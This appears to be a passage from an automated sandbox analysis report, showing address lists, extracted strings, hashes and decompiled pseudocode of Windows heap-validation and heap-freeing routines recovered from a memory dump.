0x01694d6c
0x01694d6c
0x01694d70
0x01694d7e
0x01694d84
0x01694d84
0x00000000
0x01694d49
0x01694d49
0x01694d56
0x01694d56
0x01694d59
0x00000000
0x00000000
0x01694d4e
0x01694d50
0x01694d52
0x01694d8e
0x01694d5d
0x01694d5f
0x01694d67
0x00000000
0x01694d67
0x01694d54
0x01694d54
0x01694d5b
0x00000000
0x01694d5b
0x01694ce2
0x01694ce2
0x01694ce5
0x01694ce5
0x01694ce7
0x01694cfb
0x01694ce9
0x01694ce9
0x01694cec
0x01694cef
0x01694cf1
0x01694cf3
0x01694cf3
0x01694cf3
0x01694cf6
0x01694cf6
0x01694d02
0x01694d05
0x00000000
0x00000000
0x01694d07
0x01694d0f
0x01694d11
0x00000000
0x00000000
0x00000000
0x01694d11
0x00000000
0x01694ce5
0x01694ce0
0x01694c8a
0x01694c8f
0x01694c91
0x00000000
0x00000000
0x01694c9d
0x00000000
0x01694c9d
0x01694c52
0x01694c5f
0x01694c5f
0x01694c62
0x00000000
0x00000000
0x01694c57
0x01694c59
0x01694c5b
0x01694caa
0x01694c66
0x01694c68
0x01694c70
0x01694c75
0x00000000
0x01694c75
0x01694c5d
0x01694c5d
0x01694c64
0x00000000
0x01694c64
0x01694c17
0x01694b75
0x01694bc4
0x01694bc8
0x00000000
0x00000000
0x01694bd9
0x00000000
0x00000000
0x00000000
0x01694b77
0x01694b7a
0x01694b8c
0x01694b7c
0x01694b7e
0x01694b83
0x01694b86
0x01694b86
0x01694b90
0x01694b93
0x00000000
0x00000000
0x01694b95
0x01694bab
0x01694bb0
0x00000000
0x00000000
0x01694bb2
0x01694bb9
0x00000000
0x00000000
0x01694bbb
0x01694bbe
0x01694bc1
0x01694bc1
0x00000000
0x01694bc1
0x01694b97
0x01694ba4
0x00000000
0x00000000
0x01694ba6
0x00000000
0x01694ba6
0x01694ea9
0x01694ea9
0x01694eb2
0x00000000

Strings

HEAP[%wZ]: , xrefs: 01694EE1, 01694F0D, 01694F5D, 01694FBA, 0169501D, 01695061, 016950FA
Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x), xrefs: 01695119
Free Heap block %p modified at %p after it was freed, xrefs: 01694F2F
Heap block at %p has incorrect segment offset (%x), xrefs: 0169503B
Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x), xrefs: 016950C6
Heap block at %p has corrupted PreviousSize (%lx), xrefs: 01694F81
Heap block at %p is not last block in segment (%p), xrefs: 01694FD6
HEAP: , xrefs: 01694F1A, 01694F6A, 01694FC7, 0169502A, 0169506E, 016950B6, 01695107
Heap entry %p has incorrect PreviousSize field (%04x instead of %04x), xrefs: 0169508C

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
API String ID: 0-3591852110
Opcode ID: a773304ad9de918269ca9322aeb0aee2d67eda6cf9274de3a74ade9af287b717
Instruction ID: 0148604f218b2a596495b76071e65140a77a70a5adeb0d72ebedccf27e6ccc17
Opcode Fuzzy Hash: a773304ad9de918269ca9322aeb0aee2d67eda6cf9274de3a74ade9af287b717
Instruction Fuzzy Hash: 2A12AB30200642DFDF25CF69C995ABABBFAFF48614F14845DE5868B741DB74A882CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01694496, Relevance: 10.4, Strings: 8, Instructions: 417
COMMONCrypto

Download Yara Rule

C-Code - Quality: 56%

			E01694496(signed int* __ecx, void* __edx) {
				signed int _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed char _v24;
				signed int* _v28;
				char _v32;
				signed int* _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t150;
				intOrPtr _t151;
				signed char _t156;
				intOrPtr _t157;
				unsigned int _t169;
				intOrPtr _t170;
				signed int* _t183;
				signed char _t184;
				intOrPtr _t191;
				signed int _t201;
				intOrPtr _t203;
				intOrPtr _t212;
				intOrPtr _t220;
				signed int _t230;
				signed int _t241;
				signed int _t244;
				void* _t259;
				signed int _t260;
				signed int* _t261;
				intOrPtr* _t262;
				signed int _t263;
				signed int* _t264;
				signed int _t267;
				signed int* _t268;
				void* _t270;
				void* _t281;
				signed short _t285;
				signed short _t289;
				signed int _t291;
				signed int _t298;
				signed char _t303;
				signed char _t308;
				signed int _t314;
				intOrPtr _t317;
				unsigned int _t319;
				signed int* _t325;
				signed int _t326;
				signed int _t327;
				intOrPtr _t328;
				signed int _t329;
				signed int _t330;
				signed int* _t331;
				signed int _t332;
				signed int _t350;

				_t259 = __edx;
				_t331 = __ecx;
				_v28 = __ecx;
				_v20 = 0;
				_v12 = 0;
				_t150 = E016949A4(__ecx);
				_t267 = 1;
				if(_t150 == 0) {
					L61:
					_t151 =  *[fs:0x30];
					__eflags =  *((char*)(_t151 + 2));
					if( *((char*)(_t151 + 2)) != 0) {
						 *0x16c6378 = _t267;
						asm("int3");
						 *0x16c6378 = 0;
					}
					__eflags = _v12;
					if(_v12 != 0) {
						_t105 =  &_v16;
						 *_t105 = _v16 & 0x00000000;
						__eflags =  *_t105;
						E0160174B( &_v12,  &_v16, 0x8000);
					}
					L65:
					__eflags = 0;
					return 0;
				}
				if(_t259 != 0 || (__ecx[0x10] & 0x20000000) != 0) {
					_t268 =  &(_t331[0x30]);
					_v32 = 0;
					_t260 =  *_t268;
					_t308 = 0;
					_v24 = 0;
					while(_t268 != _t260) {
						_t260 =  *_t260;
						_v16 =  *_t325 & 0x0000ffff;
						_t156 = _t325[0];
						_v28 = _t325;
						_v5 = _t156;
						__eflags = _t156 & 0x00000001;
						if((_t156 & 0x00000001) != 0) {
							_t157 =  *[fs:0x30];
							__eflags =  *(_t157 + 0xc);
							if( *(_t157 + 0xc) == 0) {
								_push("HEAP: ");
								E015DB150();
							} else {
								E015DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(_t325);
							E015DB150("dedicated (%04Ix) free list element %p is marked busy\n", _v16);
							L32:
							_t270 = 0;
							__eflags = _t331[0x13];
							if(_t331[0x13] != 0) {
								_t325[0] = _t325[0] ^ _t325[0] ^  *_t325;
								 *_t325 =  *_t325 ^ _t331[0x14];
							}
							L60:
							_t267 = _t270 + 1;
							__eflags = _t267;
							goto L61;
						}
						_t169 =  *_t325 & 0x0000ffff;
						__eflags = _t169 - _t308;
						if(_t169 < _t308) {
							_t170 =  *[fs:0x30];
							__eflags =  *(_t170 + 0xc);
							if( *(_t170 + 0xc) == 0) {
								_push("HEAP: ");
								E015DB150();
							} else {
								E015DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							E015DB150("Non-Dedicated free list element %p is out of order\n", _t325);
							goto L32;
						} else {
							__eflags = _t331[0x13];
							_t308 = _t169;
							_v24 = _t308;
							if(_t331[0x13] != 0) {
								_t325[0] = _t169 >> 0x00000008 ^ _v5 ^ _t308;
								 *_t325 =  *_t325 ^ _t331[0x14];
								__eflags =  *_t325;
							}
							_t26 =  &_v32;
							 *_t26 = _v32 + 1;
							__eflags =  *_t26;
							continue;
						}
					}
					_v16 = 0x208 + (_t331[0x21] & 0x0000ffff) * 4;
					if( *0x16c6350 != 0 && _t331[0x2f] != 0) {
						_push(4);
						_push(0x1000);
						_push( &_v16);
						_push(0);
						_push( &_v12);
						_push(0xffffffff);
						if(E01619660() >= 0) {
							_v20 = _v12 + 0x204;
						}
					}
					_t183 =  &(_t331[0x27]);
					_t281 = 0x81;
					_t326 =  *_t183;
					if(_t183 == _t326) {
						L49:
						_t261 =  &(_t331[0x29]);
						_t184 = 0;
						_t327 =  *_t261;
						_t282 = 0;
						_v24 = 0;
						_v36 = 0;
						__eflags = _t327 - _t261;
						if(_t327 == _t261) {
							L53:
							_t328 = _v32;
							_v28 = _t331;
							__eflags = _t328 - _t184;
							if(_t328 == _t184) {
								__eflags = _t331[0x1d] - _t282;
								if(_t331[0x1d] == _t282) {
									__eflags = _v12;
									if(_v12 == 0) {
										L82:
										_t267 = 1;
										__eflags = 1;
										goto L83;
									}
									_t329 = _t331[0x2f];
									__eflags = _t329;
									if(_t329 == 0) {
										L77:
										_t330 = _t331[0x22];
										__eflags = _t330;
										if(_t330 == 0) {
											L81:
											_t129 =  &_v16;
											 *_t129 = _v16 & 0x00000000;
											__eflags =  *_t129;
											E0160174B( &_v12,  &_v16, 0x8000);
											goto L82;
										}
										_t314 = _t331[0x21] & 0x0000ffff;
										_t285 = 1;
										__eflags = 1 - _t314;
										if(1 >= _t314) {
											goto L81;
										} else {
											goto L79;
										}
										while(1) {
											L79:
											_t330 = _t330 + 0x40;
											_t332 = _t285 & 0x0000ffff;
											_t262 = _v20 + _t332 * 4;
											__eflags =  *_t262 -  *((intOrPtr*)(_t330 + 8));
											if( *_t262 !=  *((intOrPtr*)(_t330 + 8))) {
												break;
											}
											_t285 = _t285 + 1;
											__eflags = _t285 - _t314;
											if(_t285 < _t314) {
												continue;
											}
											goto L81;
										}
										_t191 =  *[fs:0x30];
										__eflags =  *(_t191 + 0xc);
										if( *(_t191 + 0xc) == 0) {
											_push("HEAP: ");
											E015DB150();
										} else {
											E015DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
										}
										_push(_t262);
										_push( *((intOrPtr*)(_v20 + _t332 * 4)));
										_t148 = _t330 + 0x10; // 0x10
										_push( *((intOrPtr*)(_t330 + 8)));
										E015DB150("Tag %04x (%ws) size incorrect (%Ix != %Ix) %p\n", _t332);
										L59:
										_t270 = 0;
										__eflags = 0;
										goto L60;
									}
									_t289 = 1;
									__eflags = 1;
									while(1) {
										_t201 = _v12;
										_t329 = _t329 + 0xc;
										_t263 = _t289 & 0x0000ffff;
										__eflags =  *((intOrPtr*)(_t201 + _t263 * 4)) -  *((intOrPtr*)(_t329 + 8));
										if( *((intOrPtr*)(_t201 + _t263 * 4)) !=  *((intOrPtr*)(_t329 + 8))) {
											break;
										}
										_t289 = _t289 + 1;
										__eflags = _t289 - 0x81;
										if(_t289 < 0x81) {
											continue;
										}
										goto L77;
									}
									_t203 =  *[fs:0x30];
									__eflags =  *(_t203 + 0xc);
									if( *(_t203 + 0xc) == 0) {
										_push("HEAP: ");
										E015DB150();
									} else {
										E015DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									}
									_t291 = _v12;
									_push(_t291 + _t263 * 4);
									_push( *((intOrPtr*)(_t291 + _t263 * 4)));
									_push( *((intOrPtr*)(_t329 + 8)));
									E015DB150("Pseudo Tag %04x size incorrect (%Ix != %Ix) %p\n", _t263);
									goto L59;
								}
								_t212 =  *[fs:0x30];
								__eflags =  *(_t212 + 0xc);
								if( *(_t212 + 0xc) == 0) {
									_push("HEAP: ");
									E015DB150();
								} else {
									E015DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(_t331[0x1d]);
								_push(_v36);
								_push("Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)\n");
								L58:
								E015DB150();
								goto L59;
							}
							_t220 =  *[fs:0x30];
							__eflags =  *(_t220 + 0xc);
							if( *(_t220 + 0xc) == 0) {
								_push("HEAP: ");
								E015DB150();
							} else {
								E015DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(_t328);
							_push(_v24);
							_push("Number of free blocks in arena (%ld) does not match number in the free lists (%ld)\n");
							goto L58;
						} else {
							goto L50;
						}
						while(1) {
							L50:
							_t92 = _t327 - 0x10; // -24
							_t282 = _t331;
							_t230 = E01694AEF(_t331, _t92, _t331,  &_v24,  &_v36,  &_v28, _v20, _v12);
							__eflags = _t230;
							if(_t230 == 0) {
								goto L59;
							}
							_t327 =  *_t327;
							__eflags = _t327 - _t261;
							if(_t327 != _t261) {
								continue;
							}
							_t184 = _v24;
							_t282 = _v36;
							goto L53;
						}
						goto L59;
					} else {
						while(1) {
							_t39 = _t326 + 0x18; // 0x10
							_t264 = _t39;
							if(_t331[0x13] != 0) {
								_t319 = _t331[0x14] ^  *_t264;
								 *_t264 = _t319;
								_t303 = _t319 >> 0x00000010 ^ _t319 >> 0x00000008 ^ _t319;
								_t348 = _t319 >> 0x18 - _t303;
								if(_t319 >> 0x18 != _t303) {
									_push(_t303);
									E0168FA2B(_t264, _t331, _t264, _t326, _t331, _t348);
								}
								_t281 = 0x81;
							}
							_t317 = _v20;
							if(_t317 != 0) {
								_t241 =  *(_t326 + 0xa) & 0x0000ffff;
								_t350 = _t241;
								if(_t350 != 0) {
									if(_t350 >= 0) {
										__eflags = _t241 & 0x00000800;
										if(__eflags == 0) {
											__eflags = _t241 - _t331[0x21];
											if(__eflags < 0) {
												_t298 = _t241;
												_t65 = _t317 + _t298 * 4;
												 *_t65 =  *(_t317 + _t298 * 4) + ( *(_t326 + 0x10) >> 3);
												__eflags =  *_t65;
											}
										}
									} else {
										_t244 = _t241 & 0x00007fff;
										if(_t244 < _t281) {
											 *((intOrPtr*)(_v12 + _t244 * 4)) =  *((intOrPtr*)(_v12 + _t244 * 4)) + ( *(_t326 + 0x10) >> 3);
										}
									}
								}
							}
							if(( *(_t326 + 0x1a) & 0x00000004) != 0 && E016823E3(_t331, _t264) == 0) {
								break;
							}
							if(_t331[0x13] != 0) {
								_t264[0] = _t264[0] ^ _t264[0] ^  *_t264;
								 *_t264 =  *_t264 ^ _t331[0x14];
							}
							_t326 =  *_t326;
							if( &(_t331[0x27]) == _t326) {
								goto L49;
							} else {
								_t281 = 0x81;
								continue;
							}
						}
						__eflags = _t331[0x13];
						if(_t331[0x13] != 0) {
							 *(_t326 + 0x1b) =  *(_t326 + 0x1a) ^  *(_t326 + 0x19) ^  *(_t326 + 0x18);
							 *(_t326 + 0x18) =  *(_t326 + 0x18) ^ _t331[0x14];
						}
						goto L65;
					}
				} else {
					L83:
					return _t267;
				}
			}

0x016944a1
0x016944a3
0x016944a7
0x016944ac
0x016944af
0x016944b2
0x016944b9
0x016944bc
0x016947f2
0x016947f2
0x016947f8
0x016947fc
0x016947fe
0x01694804
0x01694805
0x01694805
0x0169480c
0x01694810
0x01694812
0x01694812
0x01694812
0x01694822
0x01694822
0x01694827
0x01694827
0x00000000
0x01694827
0x016944c4
0x016944d3
0x016944d9
0x016944dc
0x016944de
0x016944e0
0x01694560
0x01694520
0x01694522
0x01694525
0x01694528
0x0169452b
0x0169452e
0x01694530
0x01694697
0x0169469d
0x016946a1
0x016946c0
0x016946c5
0x016946a3
0x016946b8
0x016946bd
0x016946cb
0x016946d4
0x01694677
0x01694677
0x01694679
0x0169467c
0x0169468a
0x01694690
0x01694690
0x016947f1
0x016947f1
0x016947f1
0x00000000
0x016947f1
0x01694536
0x01694539
0x0169453c
0x01694636
0x0169463c
0x01694640
0x0169465f
0x01694664
0x01694642
0x01694657
0x0169465c
0x01694670
0x00000000
0x01694542
0x01694542
0x01694546
0x01694548
0x0169454b
0x01694555
0x0169455b
0x0169455b
0x0169455b
0x0169455d
0x0169455d
0x0169455d
0x00000000
0x0169455d
0x0169453c
0x01694579
0x0169457c
0x01694587
0x01694589
0x01694591
0x01694592
0x01694597
0x01694598
0x016945a1
0x016945ab
0x016945ab
0x016945a1
0x016945ae
0x016945b4
0x016945b9
0x016945bd
0x01694759
0x01694759
0x0169475f
0x01694761
0x01694763
0x01694765
0x01694768
0x0169476b
0x0169476d
0x0169479c
0x0169479c
0x0169479f
0x016947a2
0x016947a4
0x01694830
0x01694833
0x01694879
0x0169487d
0x016948f1
0x016948f3
0x016948f3
0x00000000
0x016948f3
0x0169487f
0x01694885
0x01694887
0x016948a8
0x016948a8
0x016948ae
0x016948b0
0x016948dc
0x016948dc
0x016948dc
0x016948dc
0x016948ec
0x00000000
0x016948ec
0x016948b2
0x016948bc
0x016948be
0x016948c1
0x00000000
0x00000000
0x00000000
0x00000000
0x016948c3
0x016948c3
0x016948c6
0x016948c9
0x016948cc
0x016948d1
0x016948d4
0x00000000
0x00000000
0x016948d6
0x016948d7
0x016948da
0x00000000
0x00000000
0x00000000
0x016948da
0x0169494f
0x01694955
0x01694959
0x01694978
0x0169497d
0x0169495b
0x01694970
0x01694975
0x01694986
0x01694987
0x0169498a
0x0169498d
0x01694997
0x016947ef
0x016947ef
0x016947ef
0x00000000
0x016947ef
0x01694890
0x01694890
0x01694891
0x01694891
0x01694894
0x01694897
0x0169489d
0x016948a0
0x00000000
0x00000000
0x016948a2
0x016948a3
0x016948a6
0x00000000
0x00000000
0x00000000
0x016948a6
0x016948fb
0x01694901
0x01694905
0x01694924
0x01694929
0x01694907
0x0169491c
0x01694921
0x0169492f
0x01694935
0x01694936
0x01694939
0x01694942
0x00000000
0x01694947
0x01694835
0x0169483b
0x0169483f
0x0169485e
0x01694863
0x01694841
0x01694856
0x0169485b
0x01694869
0x0169486c
0x0169486f
0x016947e7
0x016947e7
0x00000000
0x016947ec
0x016947aa
0x016947b0
0x016947b4
0x016947d3
0x016947d8
0x016947b6
0x016947cb
0x016947d0
0x016947de
0x016947df
0x016947e2
0x00000000
0x00000000
0x00000000
0x00000000
0x0169476f
0x0169476f
0x01694778
0x01694785
0x01694787
0x0169478c
0x0169478e
0x00000000
0x00000000
0x01694790
0x01694792
0x01694794
0x00000000
0x00000000
0x01694796
0x01694799
0x00000000
0x01694799
0x00000000
0x016945c3
0x016945c3
0x016945c7
0x016945c7
0x016945ca
0x016945cf
0x016945d3
0x016945df
0x016945e4
0x016945e6
0x016945e8
0x016945ed
0x016945ed
0x016945f2
0x016945f2
0x016945f7
0x016945fc
0x01694602
0x01694606
0x01694609
0x0169460f
0x016946de
0x016946e3
0x016946e5
0x016946ec
0x016946ee
0x016946f6
0x016946f6
0x016946f6
0x016946f6
0x016946ec
0x01694615
0x01694615
0x0169461d
0x0169462e
0x0169462e
0x0169461d
0x0169460f
0x01694609
0x016946fd
0x00000000
0x00000000
0x01694710
0x0169471a
0x01694720
0x01694720
0x01694722
0x0169472c
0x00000000
0x0169472e
0x0169472e
0x00000000
0x0169472e
0x0169472c
0x01694738
0x0169473c
0x0169474b
0x01694751
0x01694751
0x00000000
0x0169473c
0x016948f4
0x016948f4
0x00000000
0x016948f4

Strings

Total size of free blocks in arena (%Id) does not match number total in heap header (%Id), xrefs: 0169486F
HEAP[%wZ]: , xrefs: 01694652, 016946B3, 016947C6, 01694851, 01694917, 0169496B
Pseudo Tag %04x size incorrect (%Ix != %Ix) %p, xrefs: 0169493D
Non-Dedicated free list element %p is out of order, xrefs: 0169466B
HEAP: , xrefs: 0169465F, 016946C0, 016947D3, 0169485E, 01694924, 01694978
Tag %04x (%ws) size incorrect (%Ix != %Ix) %p, xrefs: 01694992
Number of free blocks in arena (%ld) does not match number in the free lists (%ld), xrefs: 016947E2
dedicated (%04Ix) free list element %p is marked busy, xrefs: 016946CF

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
API String ID: 0-1357697941
Opcode ID: 1322a1631bcaeb86757df8049171508923f903f73d2dddf0d73383d4f3966536
Instruction ID: 4e5e8dd8231b46aacf762db446ffdfb6d9d754d0d48be125e2d4faffb3f9058a
Opcode Fuzzy Hash: 1322a1631bcaeb86757df8049171508923f903f73d2dddf0d73383d4f3966536
Instruction Fuzzy Hash: 65F11F31600646DFDF25CFA9C980BBABBFAFF49304F05805AE1469B741DB70A946CB50

Uniqueness

Uniqueness Score: -1.00%

Function 015FA309, Relevance: 8.2, Strings: 6, Instructions: 687
COMMONCrypto

Download Yara Rule

C-Code - Quality: 72%

			E015FA309(signed int __ecx, signed int __edx, signed int _a4, char _a8) {
				char _v8;
				signed short _v12;
				signed short _v16;
				signed int _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				unsigned int _v52;
				signed int _v56;
				void* _v60;
				intOrPtr _v64;
				void* _v72;
				void* __ebx;
				void* __edi;
				void* __ebp;
				unsigned int _t246;
				signed char _t247;
				signed short _t249;
				unsigned int _t256;
				signed int _t262;
				signed int _t265;
				signed int _t266;
				signed int _t267;
				intOrPtr _t270;
				signed int _t280;
				signed int _t286;
				signed int _t289;
				intOrPtr _t290;
				signed int _t291;
				signed int _t317;
				signed short _t320;
				intOrPtr _t327;
				signed int _t339;
				signed int _t344;
				signed int _t347;
				intOrPtr _t348;
				signed int _t350;
				signed int _t352;
				signed int _t353;
				signed int _t356;
				intOrPtr _t357;
				intOrPtr _t366;
				signed int _t367;
				signed int _t370;
				intOrPtr _t371;
				signed int _t372;
				signed int _t394;
				signed short _t402;
				intOrPtr _t404;
				intOrPtr _t415;
				signed int _t430;
				signed int _t433;
				signed int _t437;
				signed int _t445;
				signed short _t446;
				signed short _t449;
				signed short _t452;
				signed int _t455;
				signed int _t460;
				signed short* _t468;
				signed int _t480;
				signed int _t481;
				signed int _t483;
				intOrPtr _t484;
				signed int _t491;
				unsigned int _t506;
				unsigned int _t508;
				signed int _t513;
				signed int _t514;
				signed int _t521;
				signed short* _t533;
				signed int _t541;
				signed int _t543;
				signed int _t546;
				unsigned int _t551;
				signed int _t553;

				_t450 = __ecx;
				_t553 = __ecx;
				_t539 = __edx;
				_v28 = 0;
				_v40 = 0;
				if(( *(__ecx + 0xcc) ^  *0x16c8a68) != 0) {
					_push(_a4);
					_t513 = __edx;
					L11:
					_t246 = E015FA830(_t450, _t513);
					L7:
					return _t246;
				}
				if(_a8 != 0) {
					__eflags =  *(__edx + 2) & 0x00000008;
					if(( *(__edx + 2) & 0x00000008) != 0) {
						 *((intOrPtr*)(__ecx + 0x230)) =  *((intOrPtr*)(__ecx + 0x230)) - 1;
						_t430 = E015FDF24(__edx,  &_v12,  &_v16);
						__eflags = _t430;
						if(_t430 != 0) {
							_t157 = _t553 + 0x234;
							 *_t157 =  *(_t553 + 0x234) - _v16;
							__eflags =  *_t157;
						}
					}
					_t445 = _a4;
					_t514 = _t539;
					_v48 = _t539;
					L14:
					_t247 =  *((intOrPtr*)(_t539 + 6));
					__eflags = _t247;
					if(_t247 == 0) {
						_t541 = _t553;
					} else {
						_t541 = (_t539 & 0xffff0000) - ((_t247 & 0x000000ff) << 0x10) + 0x10000;
						__eflags = _t541;
					}
					_t249 = 7 + _t445 * 8 + _t514;
					_v12 = _t249;
					__eflags =  *_t249 - 3;
					if( *_t249 == 3) {
						_v16 = _t514 + _t445 * 8 + 8;
						E015D9373(_t553, _t514 + _t445 * 8 + 8);
						_t452 = _v16;
						_v28 =  *(_t452 + 0x10);
						 *((intOrPtr*)(_t541 + 0x30)) =  *((intOrPtr*)(_t541 + 0x30)) - 1;
						_v36 =  *(_t452 + 0x14);
						 *((intOrPtr*)(_t541 + 0x2c)) =  *((intOrPtr*)(_t541 + 0x2c)) - ( *(_t452 + 0x14) >> 0xc);
						 *((intOrPtr*)(_t553 + 0x1e8)) =  *((intOrPtr*)(_t553 + 0x1e8)) +  *(_t452 + 0x14);
						 *((intOrPtr*)(_t553 + 0x1f8)) =  *((intOrPtr*)(_t553 + 0x1f8)) - 1;
						_t256 =  *(_t452 + 0x14);
						__eflags = _t256 - 0x7f000;
						if(_t256 >= 0x7f000) {
							_t142 = _t553 + 0x1ec;
							 *_t142 =  *(_t553 + 0x1ec) - _t256;
							__eflags =  *_t142;
							_t256 =  *(_t452 + 0x14);
						}
						_t513 = _v48;
						_t445 = _t445 + (_t256 >> 3) + 0x20;
						_a4 = _t445;
						_v40 = 1;
					} else {
						_t27 =  &_v36;
						 *_t27 = _v36 & 0x00000000;
						__eflags =  *_t27;
					}
					__eflags =  *((intOrPtr*)(_t553 + 0x54)) -  *((intOrPtr*)(_t513 + 4));
					if( *((intOrPtr*)(_t553 + 0x54)) ==  *((intOrPtr*)(_t513 + 4))) {
						_v44 = _t513;
						_t262 = E015DA9EF(_t541, _t513);
						__eflags = _a8;
						_v32 = _t262;
						if(_a8 != 0) {
							__eflags = _t262;
							if(_t262 == 0) {
								goto L19;
							}
						}
						__eflags =  *0x16c8748 - 1;
						if( *0x16c8748 >= 1) {
							__eflags = _t262;
							if(_t262 == 0) {
								_t415 =  *[fs:0x30];
								__eflags =  *(_t415 + 0xc);
								if( *(_t415 + 0xc) == 0) {
									_push("HEAP: ");
									E015DB150();
								} else {
									E015DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push("(UCRBlock != NULL)");
								E015DB150();
								__eflags =  *0x16c7bc8;
								if( *0x16c7bc8 == 0) {
									__eflags = 1;
									E01692073(_t445, 1, _t541, 1);
								}
								_t513 = _v48;
								_t445 = _a4;
							}
						}
						_t350 = _v40;
						_t480 = _t445 << 3;
						_v20 = _t480;
						_t481 = _t480 + _t513;
						_v24 = _t481;
						__eflags = _t350;
						if(_t350 == 0) {
							_t481 = _t481 + 0xfffffff0;
							__eflags = _t481;
						}
						_t483 = (_t481 & 0xfffff000) - _v44;
						__eflags = _t483;
						_v52 = _t483;
						if(_t483 == 0) {
							__eflags =  *0x16c8748 - 1;
							if( *0x16c8748 < 1) {
								goto L9;
							}
							__eflags = _t350;
							goto L146;
						} else {
							_t352 = E0160174B( &_v44,  &_v52, 0x4000);
							__eflags = _t352;
							if(_t352 < 0) {
								goto L94;
							}
							_t353 = E015F7D50();
							_t447 = 0x7ffe0380;
							__eflags = _t353;
							if(_t353 != 0) {
								_t356 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t356 = 0x7ffe0380;
							}
							__eflags =  *_t356;
							if( *_t356 != 0) {
								_t357 =  *[fs:0x30];
								__eflags =  *(_t357 + 0x240) & 0x00000001;
								if(( *(_t357 + 0x240) & 0x00000001) != 0) {
									E016914FB(_t447, _t553, _v44, _v52, 5);
								}
							}
							_t358 = _v32;
							 *((intOrPtr*)(_t553 + 0x200)) =  *((intOrPtr*)(_t553 + 0x200)) + 1;
							_t484 =  *((intOrPtr*)(_v32 + 0x14));
							__eflags = _t484 - 0x7f000;
							if(_t484 >= 0x7f000) {
								_t90 = _t553 + 0x1ec;
								 *_t90 =  *(_t553 + 0x1ec) - _t484;
								__eflags =  *_t90;
							}
							E015D9373(_t553, _t358);
							_t486 = _v32;
							 *((intOrPtr*)(_v32 + 0x14)) =  *((intOrPtr*)(_v32 + 0x14)) + _v52;
							E015D9819(_t486);
							 *((intOrPtr*)(_t541 + 0x2c)) =  *((intOrPtr*)(_t541 + 0x2c)) + (_v52 >> 0xc);
							 *((intOrPtr*)(_t553 + 0x1e8)) =  *((intOrPtr*)(_t553 + 0x1e8)) - _v52;
							_t366 =  *((intOrPtr*)(_v32 + 0x14));
							__eflags = _t366 - 0x7f000;
							if(_t366 >= 0x7f000) {
								_t104 = _t553 + 0x1ec;
								 *_t104 =  *(_t553 + 0x1ec) + _t366;
								__eflags =  *_t104;
							}
							__eflags = _v40;
							if(_v40 == 0) {
								_t533 = _v52 + _v44;
								_v32 = _t533;
								_t533[2] =  *((intOrPtr*)(_t553 + 0x54));
								__eflags = _v24 - _v52 + _v44;
								if(_v24 == _v52 + _v44) {
									__eflags =  *(_t553 + 0x4c);
									if( *(_t553 + 0x4c) != 0) {
										_t533[1] = _t533[1] ^ _t533[0] ^  *_t533;
										 *_t533 =  *_t533 ^  *(_t553 + 0x50);
									}
								} else {
									_t449 = 0;
									_t533[3] = 0;
									_t533[1] = 0;
									_t394 = _v20 - _v52 >> 0x00000003 & 0x0000ffff;
									_t491 = _t394;
									 *_t533 = _t394;
									__eflags =  *0x16c8748 - 1; // 0x0
									if(__eflags >= 0) {
										__eflags = _t491 - 1;
										if(_t491 <= 1) {
											_t404 =  *[fs:0x30];
											__eflags =  *(_t404 + 0xc);
											if( *(_t404 + 0xc) == 0) {
												_push("HEAP: ");
												E015DB150();
											} else {
												E015DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
											}
											_push("((LONG)FreeEntry->Size > 1)");
											E015DB150();
											_pop(_t491);
											__eflags =  *0x16c7bc8 - _t449; // 0x0
											if(__eflags == 0) {
												__eflags = 0;
												_t491 = 1;
												E01692073(_t449, 1, _t541, 0);
											}
											_t533 = _v32;
										}
									}
									_t533[1] = _t449;
									__eflags =  *((intOrPtr*)(_t541 + 0x18)) - _t541;
									if( *((intOrPtr*)(_t541 + 0x18)) != _t541) {
										_t402 = (_t533 - _t541 >> 0x10) + 1;
										_v16 = _t402;
										__eflags = _t402 - 0xfe;
										if(_t402 >= 0xfe) {
											_push(_t491);
											_push(_t449);
